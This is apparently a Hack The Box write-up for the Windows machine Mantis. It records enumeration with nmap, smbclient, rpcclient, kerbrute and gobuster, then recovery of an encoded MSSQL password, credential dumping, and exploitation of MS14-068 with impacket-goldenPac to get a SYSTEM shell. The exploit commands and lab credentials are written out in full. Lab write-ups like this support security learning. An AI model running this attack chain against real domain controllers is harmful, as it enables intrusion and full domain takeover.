HTB-Mantis (Hard)

Enumeration

Nmap

# Nmap 7.92 scan initiated Thu Jun  2 10:54:02 2022 as: nmap -sC -sV -oN nmap.out 10.129.92.59
Nmap scan report for 10.129.92.59
Host is up (0.37s latency).
Not shown: 982 closed tcp ports (reset)
PORT      STATE SERVICE      VERSION
88/tcp    open  kerberos-sec Microsoft Windows Kerberos (server time: 2022-06-02 15:13:36Z)
135/tcp   open  msrpc        Microsoft Windows RPC
139/tcp   open  netbios-ssn  Microsoft Windows netbios-ssn
389/tcp   open  ldap         Microsoft Windows Active Directory LDAP (Domain: htb.local, Site: Default-First-Site-Name)
445/tcp   open  microsoft-ds Windows Server 2008 R2 Standard 7601 Service Pack 1 microsoft-ds (workgroup: HTB)
464/tcp   open  kpasswd5?
593/tcp   open  ncacn_http   Microsoft Windows RPC over HTTP 1.0
636/tcp   open  tcpwrapped
1433/tcp  open  ms-sql-s     Microsoft SQL Server 2014 12.00.2000.00; RTM
|_ssl-date: 2022-06-02T15:14:55+00:00; 0s from scanner time.
| ms-sql-ntlm-info: 
|   Target_Name: HTB
|   NetBIOS_Domain_Name: HTB
|   NetBIOS_Computer_Name: MANTIS
|   DNS_Domain_Name: htb.local
|   DNS_Computer_Name: mantis.htb.local
|_  Product_Version: 6.1.7601
| ssl-cert: Subject: commonName=SSL_Self_Signed_Fallback
| Not valid before: 2022-06-02T14:55:22
|_Not valid after:  2052-06-02T14:55:22
3268/tcp  open  ldap         Microsoft Windows Active Directory LDAP (Domain: htb.local, Site: Default-First-Site-Name)
3269/tcp  open  tcpwrapped
49152/tcp open  msrpc        Microsoft Windows RPC
49153/tcp open  msrpc        Microsoft Windows RPC
49154/tcp open  msrpc        Microsoft Windows RPC
49155/tcp open  msrpc        Microsoft Windows RPC
49157/tcp open  ncacn_http   Microsoft Windows RPC over HTTP 1.0
49158/tcp open  msrpc        Microsoft Windows RPC
49176/tcp open  msrpc        Microsoft Windows RPC
Service Info: Host: MANTIS; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| smb-os-discovery: 
|   OS: Windows Server 2008 R2 Standard 7601 Service Pack 1 (Windows Server 2008 R2 Standard 6.1)
|   OS CPE: cpe:/o:microsoft:windows_server_2008::sp1
|   Computer name: mantis
|   NetBIOS computer name: MANTIS\x00
|   Domain name: htb.local
|   Forest name: htb.local
|   FQDN: mantis.htb.local
|_  System time: 2022-06-02T11:14:41-04:00
| ms-sql-info: 
|   10.129.92.59:1433: 
|     Version: 
|       name: Microsoft SQL Server 2014 RTM
|       number: 12.00.2000.00
|       Product: Microsoft SQL Server 2014
|       Service pack level: RTM
|       Post-SP patches applied: false
|_    TCP port: 1433
|_clock-skew: mean: 48m01s, deviation: 1h47m22s, median: 0s
| smb-security-mode: 
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: required
| smb2-security-mode: 
|   2.1: 
|_    Message signing enabled and required
| smb2-time: 
|   date: 2022-06-02T15:14:40
|_  start_date: 2022-06-02T14:53:26

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Thu Jun  2 11:15:09 2022 -- 1 IP address (1 host up) scanned in 1267.81 seconds

Nmap found a lot of ports.

Port 445

SMB

┌──(kali㉿kali)-[~/htb/windows/mantis]
└─$ smbmap -H 10.129.148.199             
[+] IP: 10.129.148.199:445      Name: htb.local                                         
                                                                                                                                                             
┌──(kali㉿kali)-[~/htb/windows/mantis]
└─$ smbclient -N -L //10.129.148.199     
Anonymous login successful

        Sharename       Type      Comment
        ---------       ----      -------
Reconnecting with SMB1 for workgroup listing.
do_connect: Connection to 10.129.148.199 failed (Error NT_STATUS_RESOURCE_NAME_NOT_FOUND)
Unable to connect with SMB1 -- no workgroup available

It can authenticate anonymously but return no shares.

RPC

┌──(kali㉿kali)-[~/htb/windows/mantis]
└─$ rpcclient -U '' -N 10.129.148.199
rpcclient $> querydispinfo
result was NT_STATUS_ACCESS_DENIED
rpcclient $>

rpcclient can also login with anonymous but when we query something, it display ACCESS_DENIED

Port 88 - Kerberos

User enumeration through kerbrute and we will get a couple of valid users

./kerbrute_linux_amd64 userenum --domain htb.local xato-net-10-million-usernames-dup.txt --dc 10.129.148.199

Port 1337 IIS Web Server

nmap -p- -oN all-port-scan 10.129.148.199

In full port scan, nmap display one more port which is 1337 running IIS webserver.

Bruteforcing with gobuster

┌──(kali㉿kali)-[~/htb/windows/mantis]
└─$ gobuster dir -u http://10.129.148.199:1337/ -w ~/opt/directory-list-2.3-medium.txt -o gobuster.out
===============================================================    
Gobuster v3.1.0                                                               
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================                                                                                              [+] Url:                     http://10.129.148.199:1337/
[+] Method:                  GET                                                                                                                             [+] Threads:                 10
[+] Wordlist:                /home/kali/opt/directory-list-2.3-medium.txt                                                                                    [+] Negative Status codes:   404      
[+] User Agent:              gobuster/3.1.0                                                                                                                  
[+] Timeout:                 10s     
===============================================================
2022/06/02 23:57:26 Starting gobuster in directory enumeration mode
===============================================================
/secure_notes (Status: 301)

Found a directory called secure_notes.

Web.config returned 404 and we can view dev_notes .

Notice in url, there is a base64 encoded

┌──(kali㉿kali)-[~/htb/windows/mantis]
└─$ echo "NmQyNDI0NzE2YzVmNTM0MDVmNTA0MDczNzM1NzMwNzI2NDIx" | base64 -d
6d2424716c5f53405f504073735730726421                                                                                                                                                             
┌──(kali㉿kali)-[~/htb/windows/mantis]
└─$ echo "NmQyNDI0NzE2YzVmNTM0MDVmNTA0MDczNzM1NzMwNzI2NDIx" | base64 -d | xxd -ps -r
m$$ql_S@_P@ssW0rd!

we will get mssql credential.

┌──(kali㉿kali)-[~/opt]
└─$ impacket-mssqlclient 'admin:m$$ql_S@_P@ssW0rd!@10.129.148.199'
Impacket v0.10.0 - Copyright 2022 SecureAuth Corporation

[*] Encryption required, switching to TLS
[*] ENVCHANGE(DATABASE): Old Value: master, New Value: master
[*] ENVCHANGE(LANGUAGE): Old Value: , New Value: us_english
[*] ENVCHANGE(PACKETSIZE): Old Value: 4096, New Value: 16192
[*] INFO(MANTIS\SQLEXPRESS): Line 1: Changed database context to 'master'.
[*] INFO(MANTIS\SQLEXPRESS): Line 1: Changed language setting to us_english.
[*] ACK: Result: 1 - Microsoft SQL Server (120 7208) 
[!] Press help for extra shell commands
SQL>

We can login with impacket-mssqlclient tool but database is large and it hard to dump all the data.Insert we can use GUI version called dbeaver.

Dumping James User

Found one credentials James:J@m3s_P@ssW0rd! .Now we can check with crackmapexec it valid or not.

┌──(kali㉿kali)-[~/htb/windows/mantis]
└─$ crackmapexec smb 10.129.148.199 -u 'James' -p 'J@m3s_P@ssW0rd!' 
SMB         10.129.148.199  445    MANTIS           [*] Windows Server 2008 R2 Standard 7601 Service Pack 1 x64 (name:MANTIS) (domain:htb.local) (signing:True) (SMBv1:True)
SMB         10.129.148.199  445    MANTIS           [+] htb.local\James:J@m3s_P@ssW0rd!

It not showing Pwn3d which mean we can't execute through smb.

Connect RPC client

┌──(kali㉿kali)-[~/htb/windows/mantis]
└─$ rpcclient -U htb.local/james 10.129.148.199
Enter HTB.LOCAL\james's password: 
rpcclient $> enumdomusers 
user:[Administrator] rid:[0x1f4]
user:[Guest] rid:[0x1f5]
user:[krbtgt] rid:[0x1f6]
user:[james] rid:[0x44f]
rpcclient $>

With these credential, we can also dump a list of ASP-REP vulnerable users with getnpuser tool

impacket-GetNPUsers 'htb.local/james:J@m3s_P@ssW0rd!' -dc-ip 10.129.148.199

But nothing found in this case. After some googling and found an article.

https://wizard32.net/blog/knock-and-pass-kerberos-exploitation.html

Generating Kerberos Ticket

Follow along in the blog, add dns in /etc/host , modified nameserver and run exploit.

python2 ms14-068.py -u james@htb.local -s S-1-5-21-4220043660-4019079961-2895681657-1103 -d mantis.htb.local
Password:                                                                                                                                                    
  [+] Building AS-REQ for mantis.htb.local... Done!                           
  [+] Sending AS-REQ to mantis.htb.local... Done!                                                                                                            
  [+] Receiving AS-REP from mantis.htb.local... Done!                                                                                                        
  [+] Parsing AS-REP from mantis.htb.local... Done!                                                                                                          
  [+] Building TGS-REQ for mantis.htb.local... Done!                                                                                                         
  [+] Sending TGS-REQ to mantis.htb.local... Done!                                                                                                           
  [+] Receiving TGS-REP from mantis.htb.local... Done!                                                                                                       
  [+] Parsing TGS-REP from mantis.htb.local... Done!                          
  [+] Creating ccache file 'TGT_james@htb.local.ccache'... Done!

Copy ticket to /tmp

cp TGT_james@htb.local.ccache /tmp/krb5cc_0

Getting System

Getting a shell with GoldenPac impacket tool.

impacket-goldenPac 'htb.local/james:J@m3s_P@ssW0rd!@mantis'                                                                                     [224/384]
Impacket v0.10.0 - Copyright 2022 SecureAuth Corporation                                                                                                     
                                                                              
[*] User SID: S-1-5-21-4220043660-4019079961-2895681657-1103                                                                                                 
[*] Forest SID: S-1-5-21-4220043660-4019079961-2895681657                                                                                                    
[*] Attacking domain controller mantis.htb.local                                                                                                             
[*] mantis.htb.local found vulnerable!                                        
[*] Requesting shares on mantis.....                                                                                                                         
[*] Found writable share ADMIN$                                                                                                                              
[*] Uploading file nrzWOaoC.exe                                                                                                                              
[*] Opening SVCManager on mantis.....                                                                                                                        
[*] Creating service BGjw on mantis.....                                                                                                                     
[*] Starting service BGjw.....                                                                                                                               
[!] Press help for extra shell commands                                       
Microsoft Windows [Version 6.1.7601]                                                                                                                         
Copyright (c) 2009 Microsoft Corporation.  All rights reserved.                                                                                              
                                                                                                                                                             
C:\Windows\system32>

PreviousActive Directory NextWindow Privilege Escalation

Last updated 3 years ago

hashtagEnumeration

hashtagNmap

hashtagPort 445

hashtagSMB

hashtagRPC

hashtagPort 88 - Kerberos

hashtagPort 1337 IIS Web Server

hashtagBruteforcing with gobuster

hashtagMSSQL login

hashtagDumping James User

hashtagConnect RPC client

hashtagGenerating Kerberos Ticket

hashtagGetting System